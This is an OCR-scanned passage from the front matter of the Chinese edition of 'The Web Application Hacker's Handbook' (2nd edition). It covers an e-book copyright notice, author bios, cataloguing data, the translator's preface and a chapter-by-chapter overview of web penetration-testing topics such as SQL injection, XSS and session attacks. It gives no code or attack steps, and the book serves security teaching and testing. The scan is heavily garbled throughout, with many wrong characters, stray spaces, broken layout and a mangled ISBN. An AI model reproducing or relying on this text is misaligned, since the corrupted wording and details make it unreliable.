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图 灵 社 区 的 电子 书 没有 采用 专 有 客 
尸 端 ， 您 可 以 在 任意 设备 上 ， a 
己 喜 欢 的 刘 览 器 和 PDF 阅读 器 进 
阅读 。 


但 您 购买 的 电子 书 仅 供 您 个 人 使 
用 ,未 经 授权 ， 不 得 进行 传播 。 
我 们 愿意 相信 读者 具有 这 样 的 民 基 
和 完 悟 ， 与 我 们 共同 保护 知识 产 
权 。 

如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 
对 该 用 尸 实施 包括 但 不 限于 关闭 该 
帐号 等 维权 措施 ， 并 可 能 退 究 法 律 
贡 任 。 
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如 饮 瞩 柄 


Dafydd Stuttard 

世界 知名 安全 顾问 、 作 家 、 软 件 开发 人 士 。 牛 津 大 
学 博士 ，MDSec 公 司 联合 创始 人 ， 尤 其 擅长 Web 应 
用 程序 和 编译 软件 的 渗透 测试 。Dafydd 以 网 名 
PortSwigger 旨 声 安全 界 ， 是 众所周知 的 Web 应 用 程 
序 集成 攻击 平台 Burp Suite 的 开发 者 。 


METRATE de 

资深 渗透 测试 专家 ， 剑 桥 大 学 硕士 ，MDSec 公 司 联 
合 创始 人 。Marcus 为 全 球 金融 、 政 府 、 电 信 、 博 
彩 、 零 售 等 行业 顶尖 组 织 和 机 构 提 供 Web 应 用 程序 
渗透 测试 和 安全 防御 的 咨询 与 培训 。 








DR 国 灵 程序 设计 丛书 也 锋 芝 攻 二 光 





The Web Application Hacker’s Handbook 


Finding and Exploiting Security Flaws 


起 客 攻 防 技术 至 册 


Web 据 战 遍 (第 2 版 ) 








Sy 二 入 民 和 OE 申 由 


图 书 在 版 编目 CC I P ) 数据 


黑客 攻防 技术 宝典 : 第 2 版 Web 实战 篇 / ( 瑞 ) 斯 
图 塔 德 (Stuttard,D.) ，( 瑞 ) 平 托 (Pinto,M.) 沙 ; 石 
华商 ， 健 志 红 译 ， 一 北京 : 人 民 邮 电 出 版 社 ，2012. 6 

(图 灵 程 序 设计 丛书 ) 

书 名 原文 : The Web Application Hacker”s 
Handbook:Finding and Exploiting Security Flaws 
Second Edition 

LSBN .978=7=]15=28392=4 


I .局 黑 … 开 ， 四 斯 … 思平 … @ 石 … 四 傅 … IL. 
中 计算 机 网 络 一 安全 技术 IV. (WTP393. 08 


中 国 版 本 图 书馆 CIP 数 据 核 字 (2012) 第 113416 号 


内 容 提 要 

本 书 是 探索 和 人 研究 Web 应 用 程序 安全 漏 铜 的 实践 指南 。 作 者 利用 大 量 的 实际 案例 和 示例 代码 ， 详 细 
介绍 了 各 类 Web 应 用 程序 的 弱点 ， 并 这 入 兰 述 了 如 何 针对 Web 应 用 程序 进行 具体 的 渗透 测试 。 本 书 从 介 
绍 当前 Web 应 用 程序 安全 概况 开始 ， 重 点 讨论 涂 透 测试 时 使 用 的 详细 步 又 和 技巧 ， 节 后 总 结 书 中 洱 盖 的 主 
题 。 每 章 后 还 附 有 习题 ， 便 于 读者 巩固 所 学 内 容 。 

第 2 版 新 增 了 Web 应 用 程序 安全 领域 近年 来 的 发 展 变化 新 情况 ， 并 以 尝试 访问 的 链接 形式 提供 了 几 
百 个 互动 式 “ 漏 洞 实 验 室 ”， 便 于 读者 迅速 柳 握 各 种 攻防 知识 与 技能 。 

本 书 适合 各 层次 计算 机 安全 人 士 和 Web 开发 与 管理 领域 的 技术 人 员 阅 读 。 
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译 者 序 





目 本 书 第 1 版 出 版 以 来 ，Web 安 全 状态 发 生 了 很 大 变化 ， 虽 然 随 看 人 们 安全 意识 的 提高 ， 
些 漏洞 已 经 得 到 修复 ， 但 随 春 各 种 新 技术 不 断 消 现 ， 特 别 是 Web 2.0、HTML5、 无 线 互联 网 以 及 
云 服务 的 推出 ，Web 应 用 程序 的 安全 将 面临 更 大 的 挑战 。 为 帮助 用 户 应 对 这 些 挑 战 ， 本 书 的 两 位 
作者 对 第 1 版 的 内 容 进 行 了 修订 , 新 增 了 约 30% 的 内 容 , 主要 介绍 Web 安 全 领域 的 新 趋势 及 大 量 新 
近 出 现 的 奖 洞 。 

从 第 1 版 的 读者 反 啊 来 看 ， 大 多 数 读 者 认为 本 书 内 容 较 深 ,不 太 适 合 初学 者 学 习 。 诚 然 ， 两 
位 作者 都 是 Web 安 全 领域 的 资深 专家 ， 本 书 更 是 他 们 多 年 职业 生涯 的 智 站 结晶 。 因 此 ， 建 议 谈 者 
更 多 关注 书 中 介绍 的 基本 理论 及 作者 考虑 问题 的 角度 ， 而 不 是 具体 的 渗透 测试 方法 。 

应 一 些 读者 的 要 求 , 我 们 推出 了 书 中 问题 答案 的 中 文 厂 , 感 兴趣 的 读者 可 以 访问 译 者 的 博客 
( http://blog.sina.com.cn/s/blog 545eb7860101379s.html ) 或 图 灵 社 区 本 书页 面 (http://www.ituring. 
com.cn/book/885 )。 

由 于 本 书 涉 及 内 容 非 常 广泛 ， 加 之 译 者 水 平 上 所 限 , 书 中 难免 存在 玖 涯 其 至 错误 , 幸 者 在 此 妨 
请 读者 谅解 并 指正 。 

最 后 ， 回 朱 狗 、 刘 美英 等 诸位 编辑 表示 感谢 ， 谢 谢 你 们 的 无 私 帮 助 。 还 要 感谢 我 的 家 人 ， 感 
谢 你 们 的 默默 支持 。 
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本 书 是 发 现 并 利用 Web 应 用 程序 安全 漏洞 的 实用 指南 。 这 里 的 “Web 应 用 程序 ”是 指 通过 使 
的 技术 ， 如 数据 库 、 文 件 系统 与 Web 服 务 从 


用 Web 浏 览 硕 与 Web 服 务 天 进行 通信 ， 从 而 加 以 访问 的 应 用 程序 。 本 书 不 仅 分 析 了 大 量 各 种 各 样 
建议 你 阅读 其 他 图 书 。 但 是 


而 且 讨论 了 它们 在 Web 应 用 程序 中 的 使 用 情况 。 
如 末 你 想 了 解 如 何 运 行 疾 口 扫描 、 攻 击 防火 墙 或 以 其 他 方式 对 服务 带 进 行 渗 透 测 试 ， 我们 
本 书 概述 











如 采 你 希望 了解 渗透 测试 员 如 何 攻 击 Web 应 用 程序 、 急 取 敏感 数 
据 、 执 行 未 授权 操作 , 那么 本 书 可 以 满足 你 的 震 要 。 本 书 将 就 以 上 主题 展开 全 面 而 翔实 的 讨论 。 


本 书 极其 注重 实用 性 。 虽 然 我 们 提供 了 足够 的 
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信息 与 理论 知识 
用 程序 中 包含 的 漏洞 ; 但 是 , 渗透 测试 员 在 攻击 Web 应 用 程序 时 所 需要 实施 的 步骤 及 采用 的 技巧 ， 
才 是 我 们 讨论 的 重点 所 在 。 本 书 详细 阐述 了 探查 每 一 种 漏洞 所 需 采 用 的 特定 步 又 
在 的 各 种 安全 漏洞 。 




















我 们 还 将 详细 


介绍 














以 帮助 该 者 了 解 Web 应 
它 执 行 未 授权 操作 。 我 们 还 根据 多 年 的 工作 经 验 ， 列 出 大 量 实例 ， 说 明 在 当今 Web 应 用 程序 中 存 


祭 介 
应 用 程序 为 抵御 攻击 者 而 采取 的 应 对 措施 。 同 时 ，Web 应 用 程序 渗透 测试 员 还 
可 以 从 本 书 中 获得 大 量 实用 的 建议 ， 以 帮助 应 用 程序 所 有 者 强化 他 们 的 应 用 程序 。 
本 书目 标 读者 














以 及 如 何 利 用 
男 一 方面 , 安全 意识 就 像 一 把 双 刃 剑 。 开发 者 能 够 从 了 解 攻击 者 所 使 用 的 方法 中 受益 ; 相反 ， 
黑客 也 可 以 通过 了 解 应 用 程序 的 防御 机 制 而 舌 探 它 的 受 攻击 面 。 除 介绍 安全 漏洞 与 攻击 技巧 外 ， 


本 书 的 目标 读者 是 Web 应 用 程序 渗透 测试 
了 解 你 的 敌人 有 助 于 对 他 们 进行 有 效 防 御 。 





如 浏览 二 、 


Da 


Ty 


以 及 负责 开发 和 管理 Web 应 用 程序 的 人 ， 因 为 
我 们 希望 读者 熟悉 核心 安全 概念 , 如 登录 和 访问 控制 ; 并 希望 谈 者 营 握 基本 的 核心 Web 扩 术 ， 
当前 读者 在 这 些 领 域 的 知识 欠缺 。 
口 























在 介绍 各 种 安全 源 洞 的 过 程 中 ,我 们 将 提供 代码 片断 ,说明 应 用 程序 为 何 易 受 攻击 。 这 些 示 
例 都 非常 傈 单 ， 不 需要 事先 了 解 编号 代码 的 语言 就 能 够 理解 它们 , 但 是 , 具备 阅读 或 编写 代码 的 
基础 知识 就 再 好 不 过 了 。 








Web 服 务 硕 和 HTTP。 通 过 阅读 本 书 提供 的 解释 说 明 或 其 他 参考 资料 ， 可 以 迅速 弥补 
“所 芒 








本 书 结构 


总 体 而 言 ,本 书 根据 不 同 主题 之 间 的 依赖 关系 将 内 容 组 织 在 一 起 。 如 果 你 还 不 了 解 黑 客 是 如 
何 攻 击 Web 应 用 程序 的 ， 应 该 从 头 至 尾 谈 完 本 书 ， 以 了 解 在 后 组 有 关 草 让 中 需要 用 到 的 至 景 信息 
和 技巧 。 如 采 你 在 这 方面 已 经 拥有 一 定 的 经 验 , 可 以 直接 跳 到 特别 感 兴趣 的 任何 草 贡 或 部 分 。 必 
要 时 ， 我 们 将 提供 其 他 音节 的 交叉 参考 ， 以 帮助 你 弥补 理解 上 的 欠缺 。 

本 书 前 3 章 介 绍 一 些 背 景 信 息 ， 摘 述 当 前 Web 应 用 程序 的 安全 状况 ， 说 明 它 将 来 的 发 展 趋势。 
然后 将 介绍 影响 Web 应 用 程序 的 核心 安全 问题 ， 以 及 应 用 程序 为 解决 这 些 问题 所 采取 的 防御 机 
制 。 同 时 还 将 介绍 当前 Web 应 用 程序 所 使 用 的 关键 技术 。 

本 书 的 主要 部 分 重点 讨论 核心 主题 一 一 渗透 测试 员 在 攻击 Web 应 用 程序 时 使 用 的 技巧 。 我们 
根据 实施 全 面 攻击 所 需要 完成 的 关键 任务 组 织 材 料 , 这 些 任务 依次 为 : 解析 应 用 程序 的 功能 ， 检 
查 和 攻击 它 的 核心 防御 机 制 ， 探 查 特殊 类 型 的 安全 漏洞 。 

最 后 3 草 对 本 书 涵盖 的 各 种 主题 进行 简要 总 结 : 描述 如 何在 应 用 程序 源 代码 中 查找 漏洞 ; 回 
顾 能 够 帮助 渗透 测试 员 攻 击 Web 应 用 程序 的 工具 ; 详细 介绍 攻击 方法 论 ， 说 明 渗 透 测试 员 如 何 对 
一 个 目标 应 用 程序 实施 全 面 而 深入 的 攻击 。 

第 1 章 描 述 当 前 在 因特网 上 运行 的 Web 应 用 程序 的 安全 状况 .尽管 软件 商 稼 第 保证 Web 应 用 程 
序 是 安全 的 ， 但 绝 大 多 数 的 应 用 程序 并 不 真正 安全 ， 只 要 笃 握 一 些 技巧 ， 就 能 够 攻破 它们 。Web 
应 用 程序 中 的 漏洞 源 于 一 个 核心 问题 : 用 户 可 提交 任意 输入 。 这 一 章 将 分 析 造 成 当今 应 用 程序 安 
全 状况 不 佳 的 关键 因素 ,并 说 明 Web 应 用 程序 中 存在 的 缺陷 如 何 导 人 致 组 织 庞大 的 技术 基础 染 构 非 
第 易于 受到 攻击 。 

第 2 草 摘 述 Web 应 用 程序 为 解决 “所 有 用 户 输入 都 不 可 信 ” 这 个 基本 问题 而 采用 的 核心 安全 
机 制 。 应 用 程序 通过 这 些 机 制 管 理 用 户 访问 、 欣 制 用 户 输入 、 抵 御 攻 击 者 。 这 些 机 制 还 为 管理 员 
提供 各 种 功能 ,帮助 他 们 管理 和 监控 应 用 程序 目 喘 。 应 用 程序 的 核心 安全 机 制 还 是 它 的 主要 受 攻 
击 面 ， 在 对 它们 实施 有 效 攻击 前 ， 滩 透 测试 员 必 须 了 解 这 些 机 制 的 工作 原理 。 

第 3 章 简要 介绍 渗透 测试 员 在 攻击 Web 应 用 程序 时 可 能 遇 到 的 关键 技术 ， 包 括 相 关 HTTP 协 
以 、 客 户 痊 与 服务 大 端 各 用 的 技术 以 及 各 种 数据 编码 方案 。 已 经 岗 悉 主要 Web 技 术 的 谈 者 可 以 跳 
过 本 证。 

第 4 章 描 述 渗 透 测 试 员 在 攻击 一 个 新 的 应 用 程序 时 所 需 采 取 的 第 一 步 ， 即 尽 可 能 多 地 收集 与 
应 用 程序 有 关 的 信息 ， 以 确定 它 的 受 攻击 面 ， 制订 攻击 计划 。 渗透 测试 员 需 要 搜索 并 探查 应 用 程 
序 ， 枚 举 它 的 全 部 内 容 与 功能 ， 确 定 所 有 用 户 输 入 进入 点 并 查 明 它 所 使 用 的 技术 。 

第 5 章 摘 述 了 存在 漏洞 的 第 一 个 区 域 。 如 采 一 个 应 用 程序 依靠 在 客户 端 实 现 的 控件 来 保护 它 
的 安全 ,就 可 能 造成 这 种 漏洞 。 这 种 保护 应 用 程序 的 方法 往往 存在 缺陷 ， 因 为 攻击 者 可 轻易 避 开 
任何 客户 问 控 件 。 应 用 程序 易于 受到 攻击 的 原因 有 两 个 : (1) 通过 客户 并 传送 数据 ， 认 为 这 些 数 
据 不 会 被 修改 ; (2) 依赖 客户 问 对 用 户 输入 进行 检查 。 这 一 章 将 介绍 一 系列 有 用 的 技术 ， 包括 
HIML、HTTP 与 JavaScript 所 采用 的 轻 量 级 控件 ， 以 及 使 用 Java applet、ActiveX 控 件 、Silverlight 
和 Flash 对 象 的 重量 级 控件 。 






























































































































































第 6~8 章 将 主要 介绍 Web 应 用 程序 中 最 重要 的 防御 机 制 一 一 负责 控制 用 户 访问 的 机 制 。 第 6 
章 描述 应 用 程序 确认 用 户 身 份 的 各 种 功能 , 包括 主 登 录 功 能 和 更 加 外 围 的 与 验证 有 关 的 功能 ， 如 
用 户 注册 、 密 码 修改 和 账户 恢复 功能 。 验 证 机 制 在 设计 和 执行 方面 都 包含 大 量 漏洞 ， 攻 击 者 能 够 
利用 它们 获得 未 授权 访问 ,这 些 漏 洞 包括 明显 的 缺陷 ,如 保密 性 不 强 的 密码 和 易于 受到 但 力 攻 击 ， 
以 及 验证 逻辑 中 存在 的 更 微妙 的 问题 。 这 一 章 还 将 详细 分 析 许 多 安全 性 至 关 重 要 的 应 用 程序 所 采 
用 的 多 阶段 登录 机 制 ， 并 描述 这 些 机 制 中 频繁 出 现 的 新 型 漏洞 。 

第 7 章 介绍 会 话 管理 机 制 。 大 多 数 应 用 程序 通过 有 状态 会 话 这 个 概念 补充 无 状态 的 HTTP 协 
以， 帮助 它们 在 不 同 的 请 求 中 确定 每 个 用 户 的 身份 。 当 Web 应 用 程序 受 攻击 时 ， 这 个 机 制 是 一 个 
主要 的 攻击 目标 ; 因为 如 果 能 够 攻破 它 ， 就 能 够 有 效 避 开 登 录 机 制 ,伪装 成 其 他 用 户 ， 而 不 必 知 
道 他 们 的 证 书 。 这 一 革 还 将 分 析 生 成 和 传送 会 话 令 牌 过 程 中 存在 的 各 种 常见 漏洞 ,并 描述 发 现 和 
利用 这 些 漏洞 所 需 采 取 的 步 又。 

第 8 章 说 明 应 用 程序 如 何 实施 访问 控制 。 应 用 程序 主要 依靠 验证 与 会 话 管理 机 制 来 完成 这 项 
任务 。 本 章 将 介绍 各 种 破坏 访问 控制 的 技巧 ， 以 及 探查 和 利用 这 些 弱 点 的 方法 。 

第 9 音 和 第 10 草 介绍 大 量 相关 漏洞 。 如 果 应 用 程序 以 不 安全 的 方式 在 解释 型 代码 中 搬 和 人 用户 
输入 ， 就 会 造成 这 些 漏洞 。 第 9 章 首 先 详细 介绍 SQL 注 和 漏洞， 讨论 各 种 攻击 方法 ， 从 最 明显 、 
最 简单 的 方法 到 一 系列 高 级 攻击 技巧 (如 带 外 通道 、 推 新 和 时 间 延 迟 )。 对 于 每 一 种 漏洞 和 攻击 
技巧 ,我 们 将 描述 3 种 常用 数据 库 (MS-SQL 、Oracle 和 MySQL ) 之 间 的 相关 差异 ， 然 后 介绍 一 系 
列 针 对 其 他 数据 存储 (包括 NoSQL、XPath 和 LDAP ) 的 类 似 攻击 。 

第 10 章 介绍 几 种 其 他 类 型 的 注入 漏洞 ， 包 括 注入 操作 系统 命令 ,注入 Web 脚 本 语言 ,文件 路 
径 遍 历 攻 击 ， 文 件 包 含 漏洞 ， 注 和 人 XML、SOAP、 后 端 HTTP 请 求 和 电子 邮件 服务 。 

第 11 章 将 介绍 应 用 程序 受 攻击 面 的 一 个 重要 的 、 常 被 人 们 忽略 的 区 域 一 一 实现 其 功能 的 内 部 
逻辑 。 应 用 程序 逻辑 中 的 漏洞 各 不 相同 , 它们 比 SQL 注 入 与 跨 站 点 脚本 之 类 的 常见 漏洞 更 难以 辩 
别 。 为 此 , 我 们 将 列举 一 系列 实例 ， 其 中 存在 的 逻辑 缺陷 导致 应 用 程序 易于 受到 攻击 ， 借 此 说 明 
应 用 程序 设计 者 与 开发 者 所 做 出 的 各 种 错误 假设 。 根据 这 些 各 不 相同 的 缺陷 , 我 们 将 进行 一 系列 
特殊 测试 ， 以 确定 许多 常常 难 以 探测 的 逻辑 缺 陶 。 

第 12 章 和 第 13 章 介绍 一 类 广泛 存在 且 广 受 关 注 的 相关 漏洞 ， 即 应 用 程序 的 恶意 用 户 利 用 Web 
应 用 程序 中 的 缺陷 攻击 其 他 用 户 , 并 以 各 种 方式 攻破 这 些 用 户 。 第 12 章 介绍 这 中 最 主要 的 漏洞 
一 种 影响 因特网 上 的 绝 大 多 数 Web 应 用 程序 的 广泛 存在 的 漏洞 。 我 们 将 详细 分 析 各 种 类 型 的 XSS 
漏洞 ， 并 介绍 检测 和 利用 即使 是 最 难以 察觉 的 XSS 漏 洞 的 有 效 方法 。 

第 13 章 介绍 针对 其 他 用 户 的 几 种 其 他 类 型 的 攻击 ,包括 通过 请 求 伪 造 和 UI 伪装 诱 使 用 户 执 行 
操作 、 使 用 各 种 客户 端 技 术 跨 域 获取 数据 、 各 种 针对 同 源 策略 的 攻击 、HTTP 消 息 头 注入 、cookie 
注入 和 会 话 固定 、 开 放 式 重 定 向 、 客 户 端 SQL 注 人 、 本 地 隐私 攻击 以 及 利用 ActiveX 探 件 中 的 漏 
洞 。 最 后 ， 我 们 将 讨论 一 系列 不 依赖 任何 特定 Web 应 用 程序 中 的 漏洞 、 但 可 以 通过 任何 恶意 Web 
站 点 或 处 于 适当 位 置 的 攻击 者 实施 的 针对 用 户 的 攻击 。 

第 14 章 并 不 介绍 任何 新 的 漏洞 ， 而 是 描述 一 种 渗透 测试 员 攻 击 Web 应 用 程序 时 需要 车 握 的 技 
巧 。 由 于 每 种 应 用 程序 都 各 不 相同 ， 大 多 数 攻击 都 经 过 某 种 方式 的 定制 〈 或 自 定 义 )， 以 针对 应 


















































































































































用 程序 的 特殊 行为 ， 以 及 发 现 对 攻击 有 利 的 操纵 方法 。 这 些 攻 击 还 要 求 提 出 大 量 相 似 的 请 求 ,并 
监控 应 用 程序 的 啊 应 。 手 动 执 行 这 些 请 求 非常 费力 ， 而 且 容 多 出 错 。 要 成 为 真正 史 练 的 Web 应 用 
程序 黑客 ,必须 尽 可 能 自动 实施 攻击 步骤 ,使 定制 攻击 更 加 人 简单、 快捷 而 高 效 。 本 曹 将 详细 描述 
一 种 行 之 有 效 的 方法 ， 以 完成 这 项 任务 。 我 们 还 将 讨论 在 使 用 自动 化 技巧 时 遇 到 的 各 种 障 但, 包 
括 防 御 性 的 会 话 处 理 机 制 和 CAPTCHA 控 件 。 此 外 ， 我 们 还 将 介绍 可 用 于 克服 这 些 障碍 的 工具 和 
技巧 。 

第 15 章 分 析 应 用 程序 如 何在 遭受 攻击 时 泄露 信息 。 当 实施 本 书 描述 的 其 他 各 种 攻击 时 , 渗透 
测试 员 应 该 始终 监控 应 用 程序 ,以 确定 其 他 可 供 利 用 的 信息 泄露 来 源 。 我 们 将 介绍 如 何 分 析 应 用 
程序 的 反 篆 行为 与 错误 消息 ， 以 深入 了 人 解 应 用 程序 的 内 部 工作 机 制 ,并 细 化 攻击 。 我 们 还 将 介绍 
如 何 利 用 存在 缺陷 的 错误 处 理 机 制 ， 从 应 用 程序 中 获取 敏感 信息 。 

第 16 草 介绍 在 以 C 和 C++ 等 本 地 代码 语言 编写 的 应 用 程序 中 存在 的 一 些 重 要 漏洞 。 这 些 漏洞 
包括 绥 冲 区 溢出 、 整 数 漏 洞 和 格式 化 字符 吕 漏洞 。 这 个 主题 涉及 的 内 容 非 常 广泛 ,我 们 将 重点 讨 
论 如 何在 Web 应 用 程序 中 探查 这 些 漏洞 ， 并 分 析 一 些 实 例 ， 了 人 解 造 成 这 些 漏洞 的 原因 ， 以 及 如 何 
对 它们 加 以 利用 。 

第 17 草 介绍 一 个 稼 被 忽略 的 Web 应 用 程序 安全 领域 。 许 多 应 用 程序 采用 一 种 分 层 架 构 ， 无 法 
恰当 地 隔离 这 些 层面 可 能 会 导致 应 用 程序 另 于 受到 攻击 , 导致 攻击 者 能 够 利用 在 其 中 一 个 组 件 中 
发 现 的 漏洞 迅速 攻破 整个 应 用 程序 。 共 至 托管 环境 币 来 男 外 一 些 严重 的 威胁 ， 有 时 ,攻击 者 可 以 
利用 一 个 应 用 程序 中 存在 的 缺陷 或 恶意 代码 攻破 整个 环境 及 其 中 运行 的 其 他 应 用 程序 。 本草 还 会 
介绍 一 种 众所周知 的 共享 托管 环境 “ 云 计算 ”中 出 现 的 各 种 威胁 。 

第 18 章 描述 各 种 攻击 技巧 ,说 明 如 何 通 过 攻击 Web 服 务 需 进而 攻击 其 中 运行 的 Web 应 用 程序 。 
Web 服务 大 中 存在 的 漏洞 主要 包括 服务 硕 配 置 方面 的 漏洞 以 及 Web 服 务 硕 软件 中 的 安全 漏洞 。 这 
个 主题 属于 本 书 的 讨论 范围 ， 因 为 严格 来 讲 ，Web 服 务 器 是 技术 栈 的 另 一 个 组 件 。 但 是 ， 大 多 数 
Web 服 务 硕 都 与 在 它们 之 中 运行 的 Web 应 用 程序 关系 密切 。 因 此 ， 本 书 介绍 针对 Web 服 务 硕 的 攻 
击 ， 因 为 攻击 者 常 稼 可 以 利用 它们 下 接 攻破 一 个 应 用 程序 ， 而 不 是 首先 间接 攻破 基础 主机 ， 然 后 
再 攻击 Web 应 用 程序 。 

第 19 草 摘 述 另外 一 种 查找 安全 漏洞 的 方法 。 这 种 方法 与 本 书 其 他 章节 讨论 的 方法 堆 然 不 同 。 
许多 时 候 , 我 们 都 可 以 对 应 用 程序 的 源 代 但 进行 审查 , 并 且 不 必得 到 应 用 程序 所 有 者 的 协助 。 通 
党 ,审查 应 用 程序 的 源 代码 可 以 迅速 确定 一 些 漏洞 , 但 在 运行 的 应 用 程序 中 探查 这 些 漏洞 可 能 极 
其 困难 , 或 者 需要 耗费 许多 时 间 。 我 们 将 介绍 一 种 代码 审查 方法 ,并 简要 说 明 如 何 对 以 各 种 语言 
编写 的 代码 进行 审查 ， 以 帮助 读者 在 编程 经 验 不 足 的 情况 下 进行 有 效 的 代码 审 查 。 

第 20 草 详细 介绍 本 书 描述 的 各 种 工具 。 笔者 在 攻击 真实 的 Web 应 用 程序 时 使 用 的 就 是 这 些 工 
具 。 我们 将 分 析 这 些 工具 的 主要 功能 ， 并 详细 描述 充分 运用 这 些 工 具 的 工作 流 类 型 。 男 外 ,讨论 
一 些 全 自动 工具 能 否 有 效 地 发 现 Web 应 用 程序 中 存在 的 漏洞 ， 并 提供 一 些 提示 和 建议 ， 说 明 如 何 
充分 利用 工具 包 。 

第 21 草 综合 介绍 本 书 描述 的 所 有 攻击 步骤 与 技巧 。 我 们 将 根据 渗透 测试 员 在 实施 攻击 时 所 需 
完成 的 任务 之 间 的 逻辑 依赖 关系 来 组 织 这 些 步 又 与 技巧 ,并 对 它们 进行 排序 。 如 果 你 已 经 阅读 并 






























































































































































理解 书 中 描述 的 各 种 漏洞 和 攻击 技巧， 就 可 以 把 这 个 方法 当 作 一 个 完整 的 清单 和 工作 计划 ， 对 
Web 应 用 程序 实施 渗透 测试 。 


新 增 内 容 简 介 


第 1 版 出 版 4 年 以 来 , 许多 事情 发 生 了 改变 ， 而 许多 事情 仍 保 持原 状 。 当 然 ， 新 技术 继续 高 速 
发 展 , 这 引发 了 各 种 新 型 漏洞 和 攻击 。 同 时 ,黑客 们 还 开发 出 了 新 的 攻击 技术 , 设计 了 利用 旧 有 
漏洞 的 新 方法 。 但 是 ,这 些 技 术 或 人 为 因素 都 不 可 能 引发 革命 。 今 天 应 用 程序 采用 的 技术 早 在 许 
多 年 前 就 已 经 确立 , 现今 的 先进 攻击 技术 所 蕴涵 的 基本 概念 也 早 在 高 效应 用 这 些 技术 的 许多 研究 
人 员 出 生 之 前 就 已 经 成 形 。Web 应 用 程序 安全 是 一 个 动态 有 旦 充满 活力 的 人 研究 领域 , 但 多 年 来 ， 人 
类 积累 的 智 意 也 在 缓慢 进化 ， 因 此 ， 当 前 的 技术 状况 与 10 年 或 更 久 以 前 的 情况 鹤 然 不 同 。 

第 2 版 并 不 是 对 第 1 版 的 彻底 改写 ， 第 1 版 的 大 部 分 内 容 ， 现 在 仍然 适用 。 第 2 版 约 30% 的 内 容 
为 新 增 内 容 或 改动 很 大 ， 剩 余 70% 的 内 容 仅 有 小 幅 改 动 或 未 作 任何 修改 。 如 果 谈 者 购买 了 本 书 ， 
但 对 这 些 改 动感 到 失望 ， 请 不 要 放弃 。 如 果 你 已 经 掌握 了 第 1 版 中 介绍 的 所 有 技巧 ， 说明 你 已 经 
学 会 所 需 的 绝 大 部 分 技能 和 知识 。 这 样 的 话 , 你 束 可 以 集中 精力 学 习 本 书 的 新 增 内 容 , 了 迅速 了 解 
Web 应 用 程序 安全 领域 近年 来 的 发 展 变化 情况 。 

第 2 版 的 一 个 显著 特点 是 ， 在 整 本 书 中 提供 了 所 介绍 的 几乎 所 有 漏洞 的 真实 示例 。 读 者 可 以 
使 用 “尝试 访问 ”链接 以 交互 方式 在 线 运 行书 中 讨论 的 示例 ,以 确认 可 以 发 现 并 利用 其 中 包含 的 
漏洞 。 书 中 提供 了 几 百 个 “示例 实验 室 ”"， 读 者 可 以 根据 自己 阅读 本 书 的 进度 逐个 访问 这 些 “ 实 
验 室 ”。 访 问 这 些 在 线 “ 实 验 室 ”需要 支付 一 定 的 订阅 费用 ， 这 些 费 用 主要 用 于 管理 和 维护 相关 
基础 设施 。 

如 采 读 者 希望 集中 精力 学 习 第 2 版 中 的 新 增 内 容 ， 以 下 是 对 新 增 或 改写 内 容 的 汇总 。 

第 1 昔 仪 部 分 内 容 有 所 改动 ， 将 介绍 Web 应 用 程序 的 新 应 用 、 技 术 领 域 的 一 些 显 车 趋势 ， 以 
及 组 织 的 典型 安全 边界 将 如 何 继续 发 展 变 化 。 

第 2 草 仅 有 小 幅 改 动 ， 新 增 内 容 将 介绍 儿 个 用 于 避 开 输入 确认 防御 的 常规 技巧 示例 。 

第 3 草 增 加 了 几 广 新 内 容 , 主要 介绍 各 种 新 技术 及 已 在 第 1 版 中 简要 介绍 的 技术 。 新 增 的 主题 
包括 REST、Ruby on Rails、SQL、XML、Web 服 务 、CSS、VBScript、 文档 对 和 象 模 型 、Ajax、JSON、 
同 源 策略 和 HTML5。 

第 4 草 仪 有 少量 更 新 ， 以 反映 用 于 解析 内 容 和 功能 的 技术 的 发 展 趋势 。 

第 5 草 进 行 了 大 幅 改 动 。 具 体 来 说 ， 基 本 上 重新 编号 了 有 关 浏 览 间 扩展 技术 的 几 市 内 容 ， 评 
细 介 绍 了 反 编 译 和 调试 字 节 码 的 常规 方法 、 如 何 处 理 常 规格 式 的 序列 化 数据 ,以 及 如 何 处 理 渗透 
测试 过 程 中 遇 到 的 常见 问题 ,包括 不 文 持 代 理 的 客户 问 和 SSL 问 题 。 本 草 还 将 介绍 Silverlight 技 术 。 

第 6 草 内 容 与 现今 情况 保持 一 致 ， 仅 有 小 幅 改 动 。 

第 7 章 新 增 内 容 主要 介绍 自动 测试 令 牌 随机 性 的 新 工具 。 本 章 还 包含 有 关 攻 击 加 密令 牌 的 新 
内 容 ， 包 括 如 何在 不 了 解 所 使 用 的 加 密 算 法 或 加 密 密 钥 的 情况 下 算 改 令 脾 的 实用 技巧 。 

第 8 章 将 介绍 一 些 访问 控制 漏洞 ， 包 括 由 直接 访问 服务 需 端 方法 以 及 平台 配置 不 当 (将 基于 
































































































































HTTP 的 方法 用 于 执行 访问 控制 ) 导致 的 漏洞 。 本 章 还 将 介绍 一 些 新 工具 和 技巧 ， 可 在 一 定 程度 
上 自动 完成 测试 访问 控制 的 索 瑞 任务。 

第 9 蔓 和 第 10 草 的 内 容 经 过 重组 ， 因 而 变 得 更 易于 管理 ， 其 章节 安排 也 更 符合 逻辑 。 第 9 章 主 
要 介绍 针对 其 他 数据 存储 技术 的 SQL 注入 和 其 他 类 似 攻 击 。 由 于 SQL 注入 漏洞 已 广为人知 ,并且 
在 很 大 程度 上 得 到 了 解决 ， 因 此 ， 本 章 将 着 重 介绍 现在 仍然 可 以 发 现 SQL 广 入 漏洞 的 实际 情形 。 
本 章 的 其 他 内 容 也 有 小 幅 改 动 ， 将 介绍 当前 的 技术 和 攻击 方法 。 同 时 ， 本 章 还 新 增 了 一 节 内 容 ， 
用 于 说 明 如 何 使 用 自动 化 工具 来 利用 SQL 注 入 漏洞 。 有 关 LDAP 注 入 的 内 容 经 过 大 幅 改 动 ， 以 更 
详细 地 介绍 特定 技术 (Microsoft Active Directory 和 OpenLDAP )， 以 及 利用 筑 见 漏洞 的 新 技巧 。 此 
外 ， 本 章 还 将 介绍 针对 NoSQL 的 攻击 。 

第 10 半 讨论 以 前 在 第 1 版 第 9 章 中 介绍 的 其 他 类 型 的 服务 大 端 注入 漏洞 。 新 增 内 容 主 要 介绍 
XML 外 部 实体 注入 和 注入 后 端 HTTP 请 求 ， 包 括 HITTP 人 参数 注 入 /污染 和 注入 URL 改 写 方案 。 

第 11 昔 将 提供 更 多 常见 输入 确认 功能 逻辑 缺陷 的 示例 。 由 于 越 来 越 多 的 应 用 程序 采用 加 密 来 
